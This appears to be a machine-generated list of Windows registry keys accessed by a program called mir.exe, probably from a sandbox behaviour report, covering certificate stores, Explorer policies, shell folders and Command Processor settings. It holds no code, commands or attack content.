  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs
  • HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root\PhysicalStores
  • HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs
  • HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\SmartCardRoot
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7B54741F1639CD6DE416D82CCF24FFAC934763BE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7B54741F1639CD6DE416D82CCF24FFAC934763BE\Blob
  • HKEY_CLASSES_ROOT\JavaScript
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JavaScript\OLEScript
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JavaScript\CLSID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JavaScript\CLSID\(Default)
  • HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
  • HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings
  • HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings\JITDebug
  • HKEY_CURRENT_USER\Software\Classes
  • HKEY_CURRENT_USER\Software\Classes\AppID\mir.exe
  • HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
  • HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
  • HKEY_CLASSES_ROOT\http\shell\open\command
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\http\shell\open\command\(Default)
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
  • HKEY_CURRENT_USER
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\mir.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
  • HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838-806e6f6e6963}\
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838-806e6f6e6963}\Data
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838-806e6f6e6963}\Generation
  • HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
  • HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
  • HKEY_CLASSES_ROOT\Directory
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
  • HKEY_CLASSES_ROOT\Folder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
  • HKEY_CLASSES_ROOT\AllFilesystemObjects
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
  • HKEY_CURRENT_USER\Software\Classes\360ChromeURL\Application
  • ApplicationIcon
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838-806e6f6e6963}\
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838-806e6f6e6963}\Data
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838-806e6f6e6963}\Generation
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
  • HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
  • HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties
  • HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\(Default)
  • HKEY_CURRENT_USER\Control Panel\Personalization
  • HKEY_CURRENT_USER\Control Panel\Personalization\(Default)
  • HKEY_CURRENT_USER\Software\Classes\AppID\svchost.exe
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
  • HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-Hans
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-Hans
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
  • HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
  • HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
